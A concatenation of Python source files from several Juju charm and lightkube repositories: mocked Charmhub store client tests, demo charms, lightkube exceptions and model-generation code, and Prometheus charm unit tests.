"""Get all the release information."""
client_mock.get.return_value = {
"channel-map": [
{
"channel": "latest/beta",
"expiration-date": None,
"platform": {"architecture": "all", "os": "all", "series": "all"},
"progressive": {"paused": None, "percentage": None},
"revision": 5,
"when": "2020-07-16T18:45:24Z",
"resources": [],
},
{
"channel": "latest/edge/mybranch",
"expiration-date": "2020-08-16T18:46:02Z",
"platform": {"architecture": "all", "os": "all", "series": "all"},
"progressive": {"paused": None, "percentage": None},
"revision": 10,
"when": "2020-07-16T18:46:02Z",
"resources": [],
},
],
"package": {
"channels": [
{
"branch": None,
"fallback": None,
"name": "latest/stable",
"risk": "stable",
"track": "latest",
},
{
"branch": "mybranch",
"fallback": "latest/stable",
"name": "latest/edge/mybranch",
"risk": "edge",
"track": "latest",
},
]
},
"revisions": [
{
"revision": 5,
"version": "5",
"created-at": "2020-06-29T22:11:05",
"status": "approved",
"errors": None,
},
{
"revision": 10,
"version": "63a852b",
"created-at": "2020-06-29T22:11:10",
"status": "approved",
"errors": None,
},
],
}
store = Store(config.charmhub)
channel_map, channels, revisions = store.list_releases("testname")
# check how the client is used
assert client_mock.mock_calls == [
call.get("/v1/charm/testname/releases"),
]
# check response
cmap1, cmap2 = channel_map
assert cmap1.revision == 5
assert cmap1.channel == "latest/beta"
assert cmap1.expires_at is None
assert cmap1.resources == []
assert cmap2.revision == 10
assert cmap2.channel == "latest/edge/mybranch"
assert cmap2.expires_at == parser.parse("2020-08-16T18:46:02Z")
assert cmap2.resources == []
channel1, channel2 = channels
assert channel1.name == "latest/stable"
assert channel1.track == "latest"
assert channel1.risk == "stable"
assert channel1.branch is None
assert channel2.name == "latest/edge/mybranch"
assert channel2.track == "latest"
assert channel2.risk == "edge"
assert channel2.branch == "mybranch"
rev1, rev2 = revisions
assert rev1.revision == 5
assert rev1.version == "5"
assert rev1.created_at == parser.parse("2020-06-29T22:11:05")
assert rev1.status == "approved"
assert rev1.errors == []
assert rev2.revision == 10
assert rev2.version == "63a852b"
assert rev2.created_at == parser.parse("2020-06-29T22:11:10")
assert rev2.status == "approved"
assert rev2.errors == []
def test_status_with_resources(client_mock, config):
"""Get all the release information."""
client_mock.get.return_value = {
"channel-map": [
{
"channel": "latest/stable",
"expiration-date": None,
"platform": {"architecture": "all", "os": "all", "series": "all"},
"progressive": {"paused": None, "percentage": None},
"revision": 5,
"when": "2020-07-16T18:45:24Z",
"resources": [
{
"name": "test-resource-1",
"revision": 2,
"type": "file",
},
],
},
{
"channel": "latest/edge",
"expiration-date": "2020-08-16T18:46:02Z",
"platform": {"architecture": "all", "os": "all", "series": "all"},
"progressive": {"paused": None, "percentage": None},
"revision": 5,
"when": "2020-07-16T18:46:02Z",
"resources": [
{
"name": "test-resource-1",
"revision": 2,
"type": "file",
},
{
"name": "test-resource-2",
"revision": 329,
"type": "file",
},
],
},
],
"package": {
"channels": [
{
"branch": None,
"fallback": None,
"name": "latest/edge",
"risk": "edge",
"track": "latest",
},
{
"branch": None,
"fallback": None,
"name": "latest/stable",
"risk": "stable",
"track": "latest",
},
]
},
"revisions": [
{
"revision": 5,
"version": "5",
"created-at": "2020-06-29T22:11:05",
"status": "approved",
"errors": None,
},
],
}
store = Store(config.charmhub)
channel_map, _, _ = store.list_releases("testname")
# check response
cmap1, cmap2 = channel_map
assert cmap1.revision == 5
assert cmap1.channel == "latest/stable"
assert cmap1.expires_at is None
(res,) = cmap1.resources
assert res.name == "test-resource-1"
assert res.revision == 2
assert res.resource_type == "file"
assert cmap2.revision == 5
assert cmap2.channel == "latest/edge"
assert cmap2.expires_at == parser.parse("2020-08-16T18:46:02Z")
(res1, res2) = cmap2.resources
assert res1.name == "test-resource-1"
assert res1.revision == 2
assert res1.resource_type == "file"
assert res2.name == "test-resource-2"
assert res2.revision == 329
assert res2.resource_type == "file"
# -- tests for library related functions
def test_create_library_id(client_mock, config):
"""Create a new library in the store."""
store = Store(config.charmhub)
client_mock.post.return_value = {"library-id": "test-lib-id"}
result = store.create_library_id("test-charm-name", "test-lib-name")
assert client_mock.mock_calls == [
call.post(
"/v1/charm/libraries/test-charm-name", {"library-name": "test-lib-name"}
),
]
assert result == "test-lib-id"
def test_create_library_revision(client_mock, config):
"""Create a new library revision in the store."""
test_charm_name = "test-charm-name"
test_lib_name = "test-lib-name"
test_lib_id = "test-lib-id"
test_api = "test-api-version"
test_patch = "test-patch-version"
test_content = "test content with quite a lot of funny Python code :p"
test_hash = "1234"
store = Store(config.charmhub)
client_mock.post.return_value = {
"api": test_api,
"content": test_content,
"hash": test_hash,
"library-id": test_lib_id,
"library-name": test_lib_name,
"charm-name": test_charm_name,
"patch": test_patch,
}
result_lib = store.create_library_revision(
test_charm_name, test_lib_id, test_api, test_patch, test_content, test_hash
)
payload = {
"api": test_api,
"patch": test_patch,
"content": test_content,
"hash": test_hash,
}
assert client_mock.mock_calls == [
call.post("/v1/charm/libraries/test-charm-name/" + test_lib_id, payload),
]
assert result_lib.api == test_api
assert result_lib.content == test_content
assert result_lib.content_hash == test_hash
assert result_lib.lib_id == test_lib_id
assert result_lib.lib_name == test_lib_name
assert result_lib.charm_name == test_charm_name
assert result_lib.patch == test_patch
def test_get_library(client_mock, config):
"""Get all the information (including content) for a library revision."""
test_charm_name = "test-charm-name"
test_lib_name = "test-lib-name"
test_lib_id = "test-lib-id"
test_api = "test-api-version"
test_patch = "test-patch-version"
test_content = "test content with quite a lot of funny Python code :p"
test_hash = "1234"
store = Store(config.charmhub)
client_mock.get.return_value = {
"api": test_api,
"content": test_content,
"hash": test_hash,
"library-id": test_lib_id,
"library-name": test_lib_name,
"charm-name": test_charm_name,
"patch": test_patch,
}
result_lib = store.get_library(test_charm_name, test_lib_id, test_api)
assert client_mock.mock_calls == [
call.get(
"/v1/charm/libraries/test-charm-name/{}?api={}".format(
test_lib_id, test_api
)
),
]
assert result_lib.api == test_api
assert result_lib.content == test_content
assert result_lib.content_hash == test_hash
assert result_lib.lib_id == test_lib_id
assert result_lib.lib_name == test_lib_name
assert result_lib.charm_name == test_charm_name
assert result_lib.patch == test_patch
def test_get_tips_simple(client_mock, config):
"""Get info for a lib, simple case with successful result."""
test_charm_name = "test-charm-name"
test_lib_name = "test-lib-name"
test_lib_id = "test-lib-id"
test_api = "test-api-version"
test_patch = "test-patch-version"
test_content = "test content with quite a lot of funny Python code :p"
test_hash = "1234"
store = Store(config.charmhub)
client_mock.post.return_value = {
"libraries": [
{
"api": test_api,
"content": test_content,
"hash": test_hash,
"library-id": test_lib_id,
"library-name": test_lib_name,
"charm-name": test_charm_name,
"patch": test_patch,
}
]
}
query_info = [
{"lib_id": test_lib_id},
]
result = store.get_libraries_tips(query_info)
payload = [
{"library-id": test_lib_id},
]
assert client_mock.mock_calls == [
call.post("/v1/charm/libraries/bulk", payload),
]
expected = {
(test_lib_id, test_api): Library(
api=test_api,
content=test_content,
content_hash=test_hash,
lib_id=test_lib_id,
lib_name=test_lib_name,
charm_name=test_charm_name,
patch=test_patch,
),
}
assert result == expected
def test_get_tips_empty(client_mock, config):
"""Get info for a lib, with an empty response."""
test_lib_id = "test-lib-id"
store = Store(config.charmhub)
client_mock.post.return_value = {"libraries": []}
query_info = [
{"lib_id": test_lib_id},
]
result = store.get_libraries_tips(query_info)
payload = [
{"library-id": test_lib_id},
]
assert client_mock.mock_calls == [
call.post("/v1/charm/libraries/bulk", payload),
]
assert result == {}
def test_get_tips_several(client_mock, config):
"""Get info for multiple libs at once."""
test_charm_name_1 = "test-charm-name-1"
test_lib_name_1 = "test-lib-name-1"
test_lib_id_1 = "test-lib-id-1"
test_api_1 = "test-api-version-1"
test_patch_1 = "test-patch-version-1"
test_content_1 = "test content with quite a lot of funny Python code :p"
test_hash_1 = "1234"
test_charm_name_2 = "test-charm-name-2"
test_lib_name_2 = "test-lib-name-2"
test_lib_id_2 = "test-lib-id-2"
test_api_2 = "test-api-version-2"
test_patch_2 = "test-patch-version-2"
test_content_2 = "more awesome Python code :)"
test_hash_2 = "5678"
store = Store(config.charmhub)
client_mock.post.return_value = {
"libraries": [
{
"api": test_api_1,
"content": test_content_1,
"hash": test_hash_1,
"library-id": test_lib_id_1,
"library-name": test_lib_name_1,
"charm-name": test_charm_name_1,
"patch": test_patch_1,
},
{
"api": test_api_2,
"content": test_content_2,
"hash": test_hash_2,
"library-id": test_lib_id_2,
"library-name": test_lib_name_2,
"charm-name": test_charm_name_2,
"patch": test_patch_2,
},
]
}
query_info = [
{"lib_id": test_lib_id_1},
{"lib_id": test_lib_id_2},
]
result = store.get_libraries_tips(query_info)
payload = [
{"library-id": test_lib_id_1},
{"library-id": test_lib_id_2},
]
assert client_mock.mock_calls == [
call.post("/v1/charm/libraries/bulk", payload),
]
expected = {
(test_lib_id_1, test_api_1): Library(
api=test_api_1,
content=test_content_1,
content_hash=test_hash_1,
lib_id=test_lib_id_1,
lib_name=test_lib_name_1,
charm_name=test_charm_name_1,
patch=test_patch_1,
),
(test_lib_id_2, test_api_2): Library(
api=test_api_2,
content=test_content_2,
content_hash=test_hash_2,
lib_id=test_lib_id_2,
lib_name=test_lib_name_2,
charm_name=test_charm_name_2,
patch=test_patch_2,
),
}
assert result == expected
def test_get_tips_query_combinations(client_mock, config):
"""Use all the combinations to specify what's queried."""
store = Store(config.charmhub)
client_mock.post.return_value = {"libraries": []}
query_info = [
{"lib_id": "test-lib-id-1"},
{"lib_id": "test-lib-id-2", "api": 2},
{"charm_name": "test-charm-name-3"},
{"charm_name": "test-charm-name-4", "api": 4},
{"charm_name": "test-charm-name-5", "lib_name": "test-lib-name-5"},
{"charm_name": "test-charm-name-6", "lib_name": "test-lib-name-6", "api": 6},
]
store.get_libraries_tips(query_info)
payload = [
{"library-id": "test-lib-id-1"},
{"library-id": "test-lib-id-2", "api": 2},
{"charm-name": "test-charm-name-3"},
{"charm-name": "test-charm-name-4", "api": 4},
{"charm-name": "test-charm-name-5", "library-name": "test-lib-name-5"},
{
"charm-name": "test-charm-name-6",
"library-name": "test-lib-name-6",
"api": 6,
},
]
assert client_mock.mock_calls == [
call.post("/v1/charm/libraries/bulk", payload),
]
# -- tests for list resources
def test_list_resources_ok(client_mock, config):
"""One resource ok."""
store = Store(config.charmhub)
client_mock.get.return_value = {
"resources": [
{
"name": "testresource",
"optional": True,
"revision": 9,
"type": "file",
},
]
}
result = store.list_resources("some-name")
assert client_mock.mock_calls == [call.get("/v1/charm/some-name/resources")]
(item,) = result
assert item.name == "testresource"
assert item.optional
assert item.revision == 9
assert item.resource_type == "file"
def test_list_resources_empty(client_mock, config):
"""No resources listed."""
store = Store(config.charmhub)
client_mock.get.return_value = {"resources": []}
result = store.list_resources("some-name")
assert client_mock.mock_calls == [call.get("/v1/charm/some-name/resources")]
assert result == []
def test_list_resources_several(client_mock, config):
"""Several items returned."""
client_mock.get.return_value = {
"resources": [
{
"name": "testresource1",
"optional": True,
"revision": 123,
"type": "file",
},
{
"name": "testresource2",
"optional": False,
"revision": 678,
"type": "file",
},
]
}
store = Store(config.charmhub)
result = store.list_resources("some-name")
(item1, item2) = result
assert item1.name == "testresource1"
assert item1.optional is True
assert item1.revision == 123
assert item1.resource_type == "file"
assert item2.name == "testresource2"
assert item2.optional is False
assert item2.revision == 678
assert item2.resource_type == "file"
# -- tests for list resource revisions
def test_list_resource_revisions_ok(client_mock, config):
"""One resource revision ok."""
store = Store(config.charmhub)
client_mock.get.return_value = {
"revisions": [
{
"created-at": "2021-02-11T13:43:22.396606",
"name": "otherstuff",
"revision": 1,
"sha256": "1bf0399c2de1240777ba73785f1ff1de5331f12853765a0",
"sha3-384": "deb9369cb2b9e86ad44160e93da43d240e6388c5dc67b8e2a5a3c2a36a26fe4c89",
"sha384": "eaaba6aa119da415e6ad778358a8530c47fefbe3ceced258e8c25530107dc7908e",
"sha512": (
"b8cfe885d49285d8546885167a72fd56ea23480e17c9cdd8e06b45239d79b774c6d6fc09d"
),
"size": 500,
},
]
}
result = store.list_resource_revisions("charm-name", "resource-name")
assert client_mock.mock_calls == [
call.get("/v1/charm/charm-name/resources/resource-name/revisions")
]
(item,) = result
assert item.revision == 1
assert item.created_at == parser.parse("2021-02-11T13:43:22.396606")
assert item.size == 500
def test_list_resource_revisions_empty(client_mock, config):
"""No resource revisions listed."""
store = Store(config.charmhub)
client_mock.get.return_value = {"revisions": []}
result = store.list_resource_revisions("charm-name", "resource-name")
assert client_mock.mock_calls == [
call.get("/v1/charm/charm-name/resources/resource-name/revisions")
]
assert result == []
def test_list_resource_revisions_several(client_mock, config):
"""Several items returned."""
client_mock.get.return_value = {
"revisions": [
{
"created-at": "2021-02-11T13:43:22.396606",
"name": "otherstuff",
"revision": 1,
"sha256": "1bf0399c2de1240777ba73785f1ff1de5331f12853765a0",
"sha3-384": "deb9369cb2b9e86ad44160e93da43d240e6388c5dc67b8e2a5a3c2a36a26fe4c89",
"sha384": "eaaba6aa119da415e6ad778358a8530c47fefbe3ceced258e8c25530107dc7908e",
"sha512": (
"b8cfe885d49285d8546885167a72fd56ea23480e17c9cdd8e06b45239d79b774c6d6fc09d"
),
"size": 500,
},
{
"created-at": "2021-02-11T14:23:55.659148",
"name": "otherstuff",
"revision": 2,
"sha256": "73785f1ff1de5331f12853765a01bf0399c2de1240777ba",
"sha3-384": "60e93da43d240e6388c5dc67b8e2a5a3c2a36a26fe4c89deb9369cb2b5e86ad441",
"sha384": "778358a8530c47fefbe3ceced258e8c25530107dc7908eeaaba6aa119dad15e6ad",
"sha512": (
"05167a72fd56ea23480e17c9cdd8e06b45239d79b774c6d6fc09db8cfe885d49285d8547c"
),
"size": 420,
},
]
}
store = Store(config.charmhub)
result = store.list_resource_revisions("charm-name", "resource-name")
(item1, item2) = result
assert item1.revision == 1
assert item1.created_at == parser.parse("2021-02-11T13:43:22.396606")
assert item1.size == 500
assert item2.revision == 2
assert item2.created_at == parser.parse("2021-02-11T14:23:55.659148")
assert item2.size == 420
``` |
{
"source": "jnsgruk/charm-demo-peer-relation",
"score": 2
} |
#### File: charm-demo-peer-relation/src/charm.py
```python
import logging
from ops.charm import (
CharmBase,
LeaderElectedEvent,
PebbleReadyEvent,
RelationChangedEvent,
RelationDepartedEvent,
RelationJoinedEvent,
)
from ops.framework import StoredState
from ops.main import main
from ops.model import ActiveStatus
logger = logging.getLogger(__name__)
class PeerRelationDemoCharm(CharmBase):
"""A simple charm with a placeholder workload used to demonstrate
how peer relations are formed, and how the relation data can be
accessed and manipulated
"""
_stored = StoredState()
def __init__(self, *args):
super().__init__(*args)
self.framework.observe(self.on.demo_pebble_ready, self._on_demo_pebble_ready)
# Handle the case where Juju elects a new application leader
self.framework.observe(self.on.leader_elected, self._on_leader_elected)
# Handle the various relation events
self.framework.observe(self.on.replicas_relation_joined, self._on_replicas_relation_joined)
self.framework.observe(self.on.replicas_relation_departed, self._on_replicas_relation_departed)
self.framework.observe(self.on.replicas_relation_changed, self._on_replicas_relation_changed)
self._stored.set_default(leader_ip="")
def _on_leader_elected(self, event: LeaderElectedEvent) -> None:
"""Handle the leader-elected event"""
logging.debug("Leader %s setting some data!", self.unit.name)
# Get the peer relation object
peer_relation = self.model.get_relation("replicas")
# Get the bind address from the juju model
# Convert to string as relation data must always be a string
ip = str(self.model.get_binding(peer_relation).network.bind_address)
# Update some data to trigger a replicas_relation_changed event
peer_relation.data[self.app].update({"leader-ip": ip})
def _on_replicas_relation_joined(self, event: RelationJoinedEvent) -> None:
"""Handle relation-joined event for the replicas relation"""
logger.debug("Hello from %s to %s", self.unit.name, event.unit.name)
# Check if we're the leader
if self.unit.is_leader():
# Get the bind address from the juju model
ip = str(self.model.get_binding(event.relation).network.bind_address)
logging.debug("Leader %s setting some data!", self.unit.name)
event.relation.data[self.app].update({"leader-ip": ip})
# Update our unit data bucket in the relation
event.relation.data[self.unit].update({"unit-data": self.unit.name})
def _on_replicas_relation_departed(self, event: RelationDepartedEvent) -> None:
"""Handle relation-departed event for the replicas relation"""
logger.debug("Goodbye from %s to %s", self.unit.name, event.unit.name)
def _on_replicas_relation_changed(self, event: RelationChangedEvent) -> None:
"""Handle relation-changed event for the replicas relation"""
logging.debug("Unit %s can see the following data: %s", self.unit.name, event.relation.data.keys())
# Fetch an item from the application data bucket
leader_ip_value = event.relation.data[self.app].get("leader-ip")
# Store the latest copy locally in our state store
if leader_ip_value and leader_ip_value != self._stored.leader_ip:
self._stored.leader_ip = leader_ip_value
def _on_demo_pebble_ready(self, event: PebbleReadyEvent) -> None:
"""Handle the demo-pebble-ready event"""
self.unit.status = ActiveStatus()
if __name__ == "__main__":
main(PeerRelationDemoCharm)
``` |
{
"source": "jnsgruk/hook-test",
"score": 2
} |
#### File: hook-test/src/charm.py
```python
import logging
from ops.charm import CharmBase
from ops.main import main
from ops.model import ActiveStatus
logger = logging.getLogger(__name__)
class HookTestCharm(CharmBase):
def __init__(self, *args):
super().__init__(*args)
self.framework.observe(self.on.httpbin_pebble_ready, self._on_httpbin_pebble_ready)
self.framework.observe(self.on.stop, self._on_stop)
self.framework.observe(self.on.remove, self._on_remove)
def _on_stop(self, event):
logger.info("REMOVE EVENT\nREMOVE EVENT\nREMOVE EVENT")
def _on_remove(self, event):
logger.info("REMOVE EVENT\nREMOVE EVENT\nREMOVE EVENT")
def _on_httpbin_pebble_ready(self, event):
"""Define and start a workload using the Pebble API."""
container = event.workload
pebble_layer = {
"services": {
"httpbin": {
"override": "replace",
"summary": "httpbin",
"command": "gunicorn -b 0.0.0.0:80 httpbin:app -k gevent",
"startup": "enabled",
"environment": {},
}
},
}
container.add_layer("httpbin", pebble_layer, combine=True)
container.autostart()
self.unit.status = ActiveStatus()
if __name__ == "__main__":
main(HookTestCharm)
``` |
{
"source": "jnsgruk/lightkube",
"score": 3
} |
#### File: lightkube/core/exceptions.py
```python
import httpx
from .internal_models import meta_v1
class ConfigError(Exception):
"""
Configuration specific errors.
"""
pass
class ApiError(httpx.HTTPStatusError):
status: 'meta_v1.Status'
def __init__(
self, request: httpx.Request = None, response: httpx.Response = None) -> None:
self.status = meta_v1.Status.from_dict(response.json())
super().__init__(self.status.message, request=request, response=response)
class LoadResourceError(Exception):
"""
Error in loading a resource
"""
``` |
{
"source": "jnsgruk/lightkube-models",
"score": 2
} |
#### File: lightkube-models/lightkube-generate/compile_models.py
```python
import json
import re
from collections import defaultdict
from typing import List
import shutil
from pathlib import Path
from .get_template import get_template
from .model import Model, Import
RE_MODEL = re.compile("^.*[.](apis?|pkg)[.]")
def collect_imports(module: Import, models: List[Model]):
imports = set()
for model in models:
if model.has_properties:
for prop in model.properties:
if prop.import_module:
imports.add(prop.import_module)
else:
if model.import_module:
imports.add(model.import_module)
if module in imports:
imports.remove(module)
return imports
def build_module(path: Path, modules, version, compiler_major):
p = path.joinpath("models")
if p.exists():
shutil.rmtree(p)
p.mkdir()
tmpl = get_template("models.tmpl")
for module, models in modules.items():
module_name = p.joinpath(f"{module}.py")
with module_name.open("w") as fw:
fw.write(
tmpl.render(models=models, modules=collect_imports(Import(".", module), models)))
print(f"Generated {module_name} with {len(models)} models")
with p.joinpath("__init__.py").open("w") as fw:
fw.write(f'__version__ = "{version}.{compiler_major}"\n')
def sort_key(module_name):
"""
v1alpha1 -> 1.-2.1
v1alpha2 -> 1.-2.2
v1beta1 -> 1.-1.1
v1beta2 -> 1.-1.2
v1 -> 1.2.0
"""
try:
version = module_name.split("_v", 1)[1]
except:
version = "1"
version = version.replace("alpha", ".-2.").replace("beta", ".-1.")
version = [int(x) for x in version.split(".")]
version += [0] * (3 - len(version))
return tuple(version)
def build_docs(docsdir: Path, modules, version):
version = version.rsplit(".", 1)[0]
docsdir = docsdir.joinpath("models")
if docsdir.exists():
shutil.rmtree(docsdir)
docsdir.mkdir()
docs_tmpl = get_template("models_docs.tmpl")
for module, models in modules.items():
with docsdir.joinpath(f"{module}.md").open("w") as fw:
fw.write(docs_tmpl.render(models=models, module=module))
docs_tmpl_idx = get_template("models_docs_index.tmpl")
models_to_opts = defaultdict(list)
for module, models in modules.items():
for model in models:
models_to_opts[model.name].append(module)
for opts in models_to_opts.values():
opts.sort(key=sort_key, reverse=True)
with docsdir.joinpath(f"index.md").open("w") as fw:
fw.write(docs_tmpl_idx.render(version=version, models_to_opts=sorted(models_to_opts.items())))
def build_docs_index(docsdir: Path, version):
docs_tmpl = get_template("docs_index.tmpl")
with docsdir.joinpath(f"index.md").open("w") as fw:
fw.write(docs_tmpl.render(version=version))
def build_tests(testdir, modules):
with testdir.joinpath("test_models.py").open('w') as fw:
for module, models in modules.items():
fw.write(f"from lightkube.models import {module}\n")
def execute(fname, path: Path, testdir: Path, docsdir: Path, compiler_major: str):
with open(fname) as f:
sw = json.load(f)
spec_version = sw["info"]["version"].lstrip('v')
modules = defaultdict(list)
for name, defi in sw["definitions"].items():
model = Model(name, defi)
modules[model.module].append(model)
if not docsdir.exists():
docsdir.mkdir()
build_module(path, modules, spec_version, compiler_major)
build_docs(docsdir, modules, spec_version)
build_tests(testdir, modules)
build_docs_index(docsdir, spec_version)
```
#### File: lightkube-models/lightkube-generate/mkextension.py
```python
from markdown.inlinepatterns import InlineProcessor
from markdown.extensions import Extension
import xml.etree.ElementTree as etree
class ModelLinkProcessor(InlineProcessor):
def handleMatch(self, m, data):
module, classe = m.group(1), m.group(2)
code = etree.Element("code")
el = etree.Element("a")
el.text = (module or "") + classe
if module:
parts = module[:-1].split(".")
href = f"{'../'*len(parts)}{'/'.join(parts)}/index.html#{classe.lower()}"
else:
href = f"#{classe.lower()}"
el.set("href", href)
code.append(el)
return code, m.start(0), m.end(0)
class ModelLinkExtension(Extension):
def extendMarkdown(self, md):
PATTERN = r'``(?:List\[)?([a-z_0-9.]+)?([A-Z][a-z_0-9A-Z]+)\]?``'
mp = ModelLinkProcessor(PATTERN, md)
md.inlinePatterns.register(mp, 'class-link', 200)
md.registeredExtensions.append(ModelLinkExtension())
class K8SLinkProcessor(InlineProcessor):
def handleMatch(self, m, data):
el = etree.Element("a")
el.text = "More info"
el.set("href", m.group(1))
return el, m.start(0), m.end(0)
class K8SLinkExtension(Extension):
def extendMarkdown(self, md):
PATTERN = r'More\s+info:\s+(http\S+)'
mp = K8SLinkProcessor(PATTERN, md)
md.inlinePatterns.register(mp, 'k8s-link', 200)
md.registeredExtensions.append(K8SLinkExtension())
``` |
{
"source": "jnsgruk/prometheus-operator",
"score": 2
} |
#### File: prometheus-operator/tests/test_charm.py
```python
import json
import unittest
from unittest.mock import patch
import yaml
from ops.testing import Harness
from charm import PrometheusCharm
MINIMAL_CONFIG = {"prometheus-image-path": "prom/prometheus"}
SAMPLE_ALERTING_CONFIG = {
"alertmanagers": [{"static_configs": [{"targets": ["192.168.0.1:9093"]}]}]
}
class TestCharm(unittest.TestCase):
def setUp(self):
self.harness = Harness(PrometheusCharm)
self.addCleanup(self.harness.cleanup)
self.harness.begin()
@patch("ops.testing._TestingPebbleClient.remove_path")
@patch("ops.testing._TestingPebbleClient.push")
@patch("ops.testing._TestingModelBackend.network_get")
def test_grafana_is_provided_port_and_source(self, mock_net_get, *unused):
self.harness.update_config(MINIMAL_CONFIG)
ip = "1.1.1.1"
net_info = {"bind-addresses": [{"interface-name": "ens1", "addresses": [{"value": ip}]}]}
mock_net_get.return_value = net_info
rel_id = self.harness.add_relation("grafana-source", "grafana")
self.harness.add_relation_unit(rel_id, "grafana/0")
grafana_host = self.harness.get_relation_data(rel_id, self.harness.model.unit.name)[
"grafana_source_host"
]
self.assertEqual(grafana_host, "{}:{}".format(ip, "9090"))
@patch("ops.testing._TestingPebbleClient.remove_path")
@patch("ops.testing._TestingPebbleClient.push")
def test_default_cli_log_level_is_info(self, *unused):
self.harness.update_config(MINIMAL_CONFIG)
plan = self.harness.get_container_pebble_plan("prometheus")
self.assertEqual(cli_arg(plan, "--log.level"), "info")
@patch("ops.testing._TestingPebbleClient.remove_path")
@patch("ops.testing._TestingPebbleClient.push")
def test_invalid_log_level_defaults_to_debug(self, *unused):
bad_log_config = MINIMAL_CONFIG.copy()
bad_log_config["log-level"] = "bad-level"
with self.assertLogs(level="ERROR") as logger:
self.harness.update_config(bad_log_config)
expected_logs = [
"ERROR:root:Invalid loglevel: bad-level given, "
"debug/info/warn/error/fatal allowed. "
"defaulting to DEBUG loglevel."
]
self.assertEqual(sorted(logger.output), expected_logs)
plan = self.harness.get_container_pebble_plan("prometheus")
self.assertEqual(cli_arg(plan, "--log.level"), "debug")
@patch("ops.testing._TestingPebbleClient.remove_path")
@patch("ops.testing._TestingPebbleClient.push")
def test_valid_log_level_is_accepted(self, *unused):
valid_log_config = MINIMAL_CONFIG.copy()
valid_log_config["log-level"] = "warn"
self.harness.update_config(valid_log_config)
plan = self.harness.get_container_pebble_plan("prometheus")
self.assertEqual(cli_arg(plan, "--log.level"), "warn")
@patch("ops.testing._TestingPebbleClient.remove_path")
@patch("ops.testing._TestingPebbleClient.push")
def test_ingress_relation_not_set(self, *unused):
self.harness.set_leader(True)
valid_log_config = MINIMAL_CONFIG.copy()
self.harness.update_config(valid_log_config)
plan = self.harness.get_container_pebble_plan("prometheus")
self.assertIsNone(cli_arg(plan, "--web.external-url"))
@patch("ops.testing._TestingPebbleClient.remove_path")
@patch("ops.testing._TestingPebbleClient.push")
def test_ingress_relation_set(self, *unused):
self.harness.set_leader(True)
self.harness.update_config(MINIMAL_CONFIG.copy())
rel_id = self.harness.add_relation("ingress", "ingress")
self.harness.add_relation_unit(rel_id, "ingress/0")
plan = self.harness.get_container_pebble_plan("prometheus")
self.assertEqual(
cli_arg(plan, "--web.external-url"),
"http://prometheus-k8s:9090",
)
@patch("ops.testing._TestingPebbleClient.remove_path")
@patch("ops.testing._TestingPebbleClient.push")
def test_metrics_wal_compression_is_not_enabled_by_default(self, *unused):
compress_config = MINIMAL_CONFIG.copy()
self.harness.update_config(compress_config)
plan = self.harness.get_container_pebble_plan("prometheus")
self.assertEqual(cli_arg(plan, "--storage.tsdb.wal-compression"), None)
@patch("ops.testing._TestingPebbleClient.remove_path")
@patch("ops.testing._TestingPebbleClient.push")
def test_metrics_wal_compression_can_be_enabled(self, *unused):
compress_config = MINIMAL_CONFIG.copy()
compress_config["metrics-wal-compression"] = True
self.harness.update_config(compress_config)
plan = self.harness.get_container_pebble_plan("prometheus")
self.assertEqual(
cli_arg(plan, "--storage.tsdb.wal-compression"),
"--storage.tsdb.wal-compression",
)
@patch("ops.testing._TestingPebbleClient.remove_path")
@patch("ops.testing._TestingPebbleClient.push")
def test_valid_metrics_retention_times_can_be_set(self, *unused):
retention_time_config = MINIMAL_CONFIG.copy()
acceptable_units = ["y", "w", "d", "h", "m", "s"]
for unit in acceptable_units:
retention_time = "{}{}".format(1, unit)
retention_time_config["metrics-retention-time"] = retention_time
self.harness.update_config(retention_time_config)
plan = self.harness.get_container_pebble_plan("prometheus")
self.assertEqual(cli_arg(plan, "--storage.tsdb.retention.time"), retention_time)
@patch("ops.testing._TestingPebbleClient.remove_path")
@patch("ops.testing._TestingPebbleClient.push")
def test_invalid_metrics_retention_times_can_not_be_set(self, *unused):
retention_time_config = MINIMAL_CONFIG.copy()
# invalid unit
retention_time = "1x"
retention_time_config["metrics-retention-time"] = retention_time
self.harness.update_config(retention_time_config)
plan = self.harness.get_container_pebble_plan("prometheus")
self.assertEqual(cli_arg(plan, "--storage.tsdb.retention.time"), None)
# invalid time value
retention_time = "0d"
retention_time_config["metrics-retention-time"] = retention_time
self.harness.update_config(retention_time_config)
plan = self.harness.get_container_pebble_plan("prometheus")
self.assertEqual(cli_arg(plan, "--storage.tsdb.retention.time"), None)
@patch("ops.testing._TestingPebbleClient.remove_path")
@patch("ops.testing._TestingPebbleClient.push")
def test_global_evaluation_interval_can_be_set(self, push, _):
evalint_config = MINIMAL_CONFIG.copy()
acceptable_units = ["y", "w", "d", "h", "m", "s"]
for unit in acceptable_units:
push.reset()
evalint_config["evaluation-interval"] = "{}{}".format(1, unit)
self.harness.update_config(evalint_config)
config = push.call_args[0]
gconfig = global_config(config)
self.assertEqual(gconfig["evaluation_interval"], evalint_config["evaluation-interval"])
@patch("ops.testing._TestingPebbleClient.remove_path")
@patch("ops.testing._TestingPebbleClient.push")
def test_default_scrape_config_is_always_set(self, push, _):
self.harness.update_config(MINIMAL_CONFIG)
config = push.call_args[0]
prometheus_scrape_config = scrape_config(config, "prometheus")
self.assertIsNotNone(prometheus_scrape_config, "No default config found")
@patch("prometheus_server.Prometheus.reload_configuration")
@patch("ops.testing._TestingPebbleClient.push")
@patch("ops.testing._TestingPebbleClient.remove_path")
def test_configuration_reload(self, push, trigger_configuration_reload, _):
self.harness.container_pebble_ready("prometheus")
push.assert_called()
self.harness.update_config(MINIMAL_CONFIG)
push.assert_called()
trigger_configuration_reload.assert_called()
label_config = MINIMAL_CONFIG.copy()
labels = {"name1": "value1", "name2": "value2"}
label_config["external-labels"] = json.dumps(labels)
self.harness.update_config(label_config)
trigger_configuration_reload.assert_called()
def alerting_config(config):
config_yaml = config[1]
config_dict = yaml.safe_load(config_yaml)
return config_dict.get("alerting")
def global_config(config):
config_yaml = config[1]
config_dict = yaml.safe_load(config_yaml)
return config_dict["global"]
def scrape_config(config, job_name):
config_yaml = config[1]
config_dict = yaml.safe_load(config_yaml)
scrape_configs = config_dict["scrape_configs"]
for config in scrape_configs:
if config["job_name"] == job_name:
return config
return None
def cli_arg(plan, cli_opt):
plan_dict = plan.to_dict()
args = plan_dict["services"]["prometheus"]["command"].split()
for arg in args:
opt_list = arg.split("=")
if len(opt_list) == 2 and opt_list[0] == cli_opt:
return opt_list[1]
if len(opt_list) == 1 and opt_list[0] == cli_opt:
return opt_list[0]
return None
``` |
{
"source": "jnsgruk/python-libjuju",
"score": 2
} |
#### File: tests/integration/test_juju.py
```python
import pytest
